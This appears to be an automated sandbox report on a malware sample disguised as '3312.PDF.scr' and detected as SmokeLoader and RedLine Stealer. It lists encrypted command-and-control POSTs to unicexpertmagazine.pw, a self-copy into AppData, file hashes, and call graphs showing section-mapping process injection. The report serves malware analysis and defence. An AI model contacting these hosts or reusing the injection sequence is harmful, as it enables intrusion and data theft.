                                                                                  • hdfqubgmiehcd.net
                                                                                  • rsswvdbjffron.com
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.44973645.143.201.14802580C:\Windows\explorer.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 1, 2024 09:35:09.538768053 CEST288OUTPOST /index.php HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Accept: */*
                                                                                  Referer: http://mvrswdonrbcmf.org/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Content-Length: 260
                                                                                  Host: unicexpertmagazine.pw
                                                                                  Oct 1, 2024 09:35:09.538780928 CEST260OUTData Raw: a1 5f 79 54 83 31 5f bf c0 3c d7 cb 8f b5 2a 46 57 35 c6 53 17 c0 35 2b a8 51 ce 1a 01 8c 05 25 cf 5e d4 fc 3e a4 04 3b 5b bc cd 0f b5 45 12 33 db 73 6b 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be b9 1f 65 ac
                                                                                  Data Ascii: _yT1_<*FW5S5+Q%^>;[E3sk2m-^JrC)eEr%,Ai95Vn=#~E\<1=A\IsZ*`AkgXrk({F'BJ<KF{kwXw9$ !kKs{}@.yR[Y7p
                                                                                  Oct 1, 2024 09:35:10.765750885 CEST583INHTTP/1.1 404 Not Found
                                                                                  server: nginx/1.18.0
                                                                                  date: Tue, 01 Oct 2024 07:35:10 GMT
                                                                                  content-type: text/html; charset=utf-8
                                                                                  transfer-encoding: chunked
                                                                                  Data Raw: 31 41 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                  Data Ascii: 1A2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
                                                                                  Oct 1, 2024 09:35:10.765795946 CEST583INHTTP/1.1 404 Not Found
                                                                                  server: nginx/1.18.0
                                                                                  date: Tue, 01 Oct 2024 07:35:10 GMT
                                                                                  content-type: text/html; charset=utf-8
                                                                                  transfer-encoding: chunked
                                                                                  Data Raw: 31 41 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                  Data Ascii: 1A2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.44973845.143.201.14802580C:\Windows\explorer.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 1, 2024 09:36:15.994292974 CEST288OUTPOST /index.php HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Accept: */*
                                                                                  Referer: http://hdfqubgmiehcd.net/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Content-Length: 245
                                                                                  Host: unicexpertmagazine.pw
                                                                                  Oct 1, 2024 09:36:15.994332075 CEST245OUTData Raw: a1 5f 79 54 83 31 5f bf c0 3c d7 cb 8f b5 2a 46 57 35 c6 53 17 c0 35 2b a8 51 ce 1a 01 8c 05 25 cf 5e d4 fc 3e a4 04 3b 5b bc cd 0f b5 45 12 33 db 73 6b 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be f8 09 6b a9
                                                                                  Data Ascii: _yT1_<*FW5S5+Q%^>;[E3sk2m-^JrC)k C>-@+{j\}WM<pF0P=2vbL[v*XD /B|H$%MW~N4!HBo'v&qDh"OI'8\ome%
                                                                                  Oct 1, 2024 09:36:16.813863993 CEST583INHTTP/1.1 404 Not Found
                                                                                  server: nginx/1.18.0
                                                                                  date: Tue, 01 Oct 2024 07:36:16 GMT
                                                                                  content-type: text/html; charset=utf-8
                                                                                  transfer-encoding: chunked
                                                                                  Data Raw: 31 41 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                  Data Ascii: 1A2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.44973945.143.201.14802580C:\Windows\explorer.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 1, 2024 09:36:16.975697994 CEST288OUTPOST /index.php HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Accept: */*
                                                                                  Referer: http://rsswvdbjffron.com/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Content-Length: 195
                                                                                  Host: unicexpertmagazine.pw
                                                                                  Oct 1, 2024 09:36:16.976521015 CEST195OUTData Raw: a1 5f 79 54 83 31 5f bf c0 3c d7 cb 8f b5 2a 46 57 35 c6 53 17 c0 35 2b a8 51 ce 1a 01 8c 05 25 cf 5e d4 fc 3e a4 04 3b 5b bc cd 0f b5 45 12 33 db 73 6b 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e9 2d 73 dc
                                                                                  Data Ascii: _yT1_<*FW5S5+Q%^>;[E3sk2m-^JrC)-st\6J:qQ9Qfy>)<a>4Nq1yKa~t4w !}dy~j'|(>SuY=&
                                                                                  Oct 1, 2024 09:36:17.877274036 CEST583INHTTP/1.1 404 Not Found
                                                                                  server: nginx/1.18.0
                                                                                  date: Tue, 01 Oct 2024 07:36:17 GMT
                                                                                  content-type: text/html; charset=utf-8
                                                                                  transfer-encoding: chunked
                                                                                  Data Raw: 31 41 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                  Data Ascii: 1A2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:03:34:41
                                                                                  Start date:01/10/2024
                                                                                  Path:C:\Users\user\Desktop\3312.PDF.scr
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\3312.PDF.scr" /S
                                                                                  Imagebase:0x400000
                                                                                  File size:219'648 bytes
                                                                                  MD5 hash:4E30F8FA403546790A16A9B0E0C72F02
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1761506014.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1761888720.000000000082D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1761540822.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1761540822.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1761578601.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1761578601.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:03:34:49
                                                                                  Start date:01/10/2024
                                                                                  Path:C:\Windows\explorer.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                  Imagebase:0x7ff72b770000
                                                                                  File size:5'141'208 bytes
                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:03:35:09
                                                                                  Start date:01/10/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\djjergw
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\djjergw
                                                                                  Imagebase:0x400000
                                                                                  File size:219'648 bytes
                                                                                  MD5 hash:4E30F8FA403546790A16A9B0E0C72F02
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2038380670.0000000002160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2038380670.0000000002160000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2038193053.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2038289843.000000000060D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2038416876.0000000002181000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2038416876.0000000002181000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:03:36:18
                                                                                  Start date:01/10/2024
                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 2580 -s 9020
                                                                                  Imagebase:0x7ff6bce70000
                                                                                  File size:570'736 bytes
                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:10
                                                                                  Start time:03:36:21
                                                                                  Start date:01/10/2024
                                                                                  Path:C:\Windows\explorer.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:explorer.exe
                                                                                  Imagebase:0x7ff72b770000
                                                                                  File size:5'141'208 bytes
                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:8.6%
                                                                                    Dynamic/Decrypted Code Coverage:17.9%
                                                                                    Signature Coverage:50%
                                                                                    Total number of Nodes:156
                                                                                    Total number of Limit Nodes:5
                                                                                    execution_graph 4165 6a092b GetPEB 4166 6a0972 4165->4166 4066 402e42 4067 402e47 4066->4067 4068 402f18 4067->4068 4070 4020ea NtQuerySystemInformation 4067->4070 4071 402f4c 4067->4071 4069 401902 8 API calls 4068->4069 4068->4071 4069->4071 4070->4068 4078 418606 4079 418610 4078->4079 4080 4185c0 SetPriorityClass 4079->4080 4081 41862d GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 4079->4081 4082 41866b 4079->4082 4080->4079 4081->4079 4179 40190e 4180 401912 4179->4180 4182 4018b5 4179->4182 4181 401946 Sleep 4180->4181 4183 401961 4181->4183 4184 401529 7 API calls 4183->4184 4185 401972 4183->4185 4184->4185 3941 82fdd2 3942 82fde1 3941->3942 3945 830572 3942->3945 3946 83058d 3945->3946 3947 830596 CreateToolhelp32Snapshot 3946->3947 3948 8305b2 Module32First 3946->3948 3947->3946 3947->3948 3949 8305c1 3948->3949 3950 82fdea 3948->3950 3952 830231 3949->3952 3953 83025c 3952->3953 3954 8302a5 3953->3954 3955 83026d VirtualAlloc 3953->3955 3954->3954 3955->3954 4014 6a003c 4015 6a0049 4014->4015 4027 6a0e0f SetErrorMode SetErrorMode 4015->4027 4020 6a0265 4021 6a02ce VirtualProtect 4020->4021 4023 6a030b 4021->4023 4022 6a0439 VirtualFree 4026 6a04be LoadLibraryA 4022->4026 4023->4022 4025 6a08c7 4026->4025 4028 6a0223 4027->4028 4029 6a0d90 4028->4029 4030 6a0dad 4029->4030 4031 6a0dbb GetPEB 4030->4031 4032 6a0238 VirtualAlloc 4030->4032 4031->4032 4032->4020 4083 4014db 4084 40148f 4083->4084 4092 401469 4083->4092 4084->4083 4085 4015d5 NtDuplicateObject 4084->4085 4084->4092 4086 4015f2 NtCreateSection 4085->4086 4085->4092 4087 401672 NtCreateSection 4086->4087 4088 401618 NtMapViewOfSection 4086->4088 4090 40169e 4087->4090 4087->4092 4088->4087 4089 40163b NtMapViewOfSection 4088->4089 4089->4087 4091 401659 4089->4091 4090->4092 4093 4016a8 NtMapViewOfSection 4090->4093 4091->4087 4093->4092 4094 4016cf NtMapViewOfSection 4093->4094 4094->4092 4190 401922 4191 401930 4190->4191 4192 401946 Sleep 4191->4192 4193 401961 4192->4193 4194 401529 7 API calls 4193->4194 4195 401972 4193->4195 4194->4195 3956 418b70 3959 418730 3956->3959 3958 418b75 3960 41873d 3959->3960 3961 418840 7 API calls 3960->3961 3968 418993 3960->3968 3963 4188c5 7 API calls 3961->3963 3962 4189a1 SetCommMask 3962->3968 3964 418971 3963->3964 3965 418965 ObjectPrivilegeAuditAlarmW 3963->3965 3966 418982 3964->3966 3967 41897a WaitForSingleObject 3964->3967 3965->3964 3966->3968 3967->3966 3968->3962 3969 4189b1 GetUserObjectInformationW 3968->3969 3970 4189d2 3968->3970 3969->3968 3971 4189db GetConsoleAliasesLengthW GetComputerNameW GetConsoleAliasExesLengthW GetBinaryType PurgeComm 3970->3971 3972 418a4d 3970->3972 3979 418a2b 3971->3979 3984 4183c0 LocalAlloc 3972->3984 3976 418a52 LoadLibraryA 3985 4183f0 GetModuleHandleW GetProcAddress VirtualProtect 3976->3985 3977 418a9d 3986 418690 3977->3986 3979->3972 3980 418aa2 3981 418ae3 InterlockedCompareExchange 3980->3981 3982 418ac3 MoveFileW 3980->3982 3983 418afd 3980->3983 3981->3980 3982->3980 3983->3958 3984->3976 3985->3977 3987 4186b9 QueryDosDeviceA 3986->3987 3988 4186cd 3986->3988 3987->3988 3997 418590 3988->3997 3991 4186e0 FreeEnvironmentStringsA 3992 4186e8 3991->3992 4000 4185d0 3992->4000 3995 41871a 3995->3980 3996 4186ff HeapCreate GetNumaProcessorNode 3996->3995 3998 4185a1 FatalAppExitA GetModuleHandleA 3997->3998 3999 4185b3 3997->3999 3998->3999 3999->3991 3999->3992 4001 4185ec 4000->4001 4002 4185de BuildCommDCBA 4000->4002 4003 4185f4 FreeEnvironmentStringsA 4001->4003 4006 4185fc 4001->4006 4002->4006 4003->4006 4004 41866b 4004->3995 4004->3996 4006->4004 4007 41862d GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 4006->4007 4008 4185c0 4006->4008 4007->4006 4011 418540 4008->4011 4012 41856b 4011->4012 4013 41855c SetPriorityClass 4011->4013 4012->4006 4013->4012 4212 401534 4213 401546 4212->4213 4214 4015d5 NtDuplicateObject 4213->4214 4221 4016f1 4213->4221 4215 4015f2 NtCreateSection 4214->4215 4214->4221 4216 401672 NtCreateSection 4215->4216 4217 401618 NtMapViewOfSection 4215->4217 4219 40169e 4216->4219 4216->4221 4217->4216 4218 40163b NtMapViewOfSection 4217->4218 4218->4216 4220 401659 4218->4220 4219->4221 4222 4016a8 NtMapViewOfSection 4219->4222 4220->4216 4222->4221 4223 4016cf NtMapViewOfSection 4222->4223 4223->4221 4033 402ffa 4034 40313d 4033->4034 4035 403024 4033->4035 4035->4034 4036 4030df RtlCreateUserThread NtTerminateProcess 4035->4036 4036->4034 4037 402ebc 4040 402eb4 4037->4040 4038 402f18 4042 402f4c 4038->4042 4048 401902 4038->4048 4040->4038 4040->4042 4043 4020ea 4040->4043 4044 4020fb 4043->4044 4045 40214e 4044->4045 4046 402152 NtQuerySystemInformation 4044->4046 4047 40216e 4044->4047 4045->4044 4045->4046 4046->4045 4047->4038 4049 401913 4048->4049 4050 401946 Sleep 4049->4050 4051 401961 4050->4051 4053 401972 4051->4053 4054 401529 4051->4054 4053->4042 4055 401539 4054->4055 4056 4015d5 NtDuplicateObject 4055->4056 4063 4016f1 4055->4063 4057 4015f2 NtCreateSection 4056->4057 4056->4063 4058 401672 NtCreateSection 4057->4058 4059 401618 NtMapViewOfSection 4057->4059 4061 40169e 4058->4061 4058->4063 4059->4058 4060 40163b NtMapViewOfSection 4059->4060 4060->4058 4062 401659 4060->4062 4061->4063 4064 4016a8 NtMapViewOfSection 4061->4064 4062->4058 4063->4053 4064->4063 4065 4016cf NtMapViewOfSection 4064->4065 4065->4063 4095 4020fc 4096 402107 4095->4096 4097 402152 NtQuerySystemInformation 4096->4097 4098 40216e 4096->4098 4097->4096

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 418730-418758 2 418760-418767 0->2 3 418794-41879a 2->3 4 418769-418790 2->4 5 41879c-4187a8 3->5 6 4187ae-4187b8 3->6 4->3 5->6 7 4187f3-4187fa 6->7 8 4187ba-4187e9 6->8 7->2 9 418800-418806 7->9 8->7 11 418808-41880e 9->11 12 418810-418816 11->12 13 41881c-418826 11->13 12->13 14 418828 13->14 15 41882a-418831 13->15 14->15 15->11 16 418833-41883a 15->16 17 418840-418963 InterlockedCompareExchange SetFocus ReadConsoleA FindAtomA SearchPathA GetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameW GetSystemTimeAdjustment 16->17 18 418993-41899f 16->18 22 418971-418978 17->22 23 418965-41896b ObjectPrivilegeAuditAlarmW 17->23 19 4189a1-4189af SetCommMask 18->19 26 4189c1-4189c7 19->26 27 4189b1-4189bb GetUserObjectInformationW 19->27 24 418982-418990 22->24 25 41897a-41897c WaitForSingleObject 22->25 23->22 24->18 25->24 28 4189d2-4189d9 26->28 29 4189c9-4189d0 26->29 27->26 31 4189db-418a47 GetConsoleAliasesLengthW GetComputerNameW GetConsoleAliasExesLengthW GetBinaryType PurgeComm 28->31 32 418a4d-418a5c call 4183c0 28->32 29->19 29->28 31->32 37 418a8d-418a98 LoadLibraryA call 4183f0 32->37 38 418a5e-418a6f 32->38 44 418a9d-418aae call 418690 37->44 41 418a70-418a80 38->41 42 418a82 41->42 43 418a88-418a8b 41->43 42->43 43->37 43->41 49 418ab0-418ab7 44->49 50 418ab9-418ac7 MoveFileW 49->50 51 418acd-418ad3 49->51 50->51 53 418ad5 call 4183e0 51->53 54 418ada-418ae1 51->54 53->54 55 418ae3-418aee InterlockedCompareExchange 54->55 56 418af4-418afb 54->56 55->56 56->49 59 418afd-418b0d 56->59 60 418b10-418b20 59->60 62 418b22 60->62 63 418b29-418b2c 60->63 62->63 63->60 64 418b2e-418b39 63->64 65 418b40-418b45 64->65 66 418b47-418b4d 65->66 67 418b4f-418b55 65->67 66->67 68 418b57-418b64 66->68 67->65 67->68
                                                                                    APIs
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041884B
                                                                                    • SetFocus.USER32(00000000), ref: 00418854
                                                                                    • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041885F
                                                                                    • FindAtomA.KERNEL32(00000000), ref: 00418866
                                                                                    • SearchPathA.KERNEL32(0041A3EC,0041A3D0,0041A3C8,00000000,?,?), ref: 0041888A
                                                                                    • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418892
                                                                                    • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004188AA
                                                                                    • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 004188D1
                                                                                    • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188DD
                                                                                    • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 004188F3
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 004188F9
                                                                                    • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041893E
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0041894D
                                                                                    • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418956
                                                                                    • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041896B
                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041897C
                                                                                    • SetCommMask.KERNELBASE(00000000,00000000), ref: 004189A5
                                                                                    • GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004189BB
                                                                                    • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 004189EA
                                                                                    • GetComputerNameW.KERNEL32(?,?), ref: 004189FE
                                                                                    • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418A04
                                                                                    • GetBinaryType.KERNEL32(0041A404,?), ref: 00418A16
                                                                                    • PurgeComm.KERNEL32(00000000,00000000), ref: 00418A1E
                                                                                    • LoadLibraryA.KERNELBASE(0041A420), ref: 00418A92
                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00418AC7
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418AEE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1761335489.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_40b000_3312.jbxd
                                                                                    Similarity
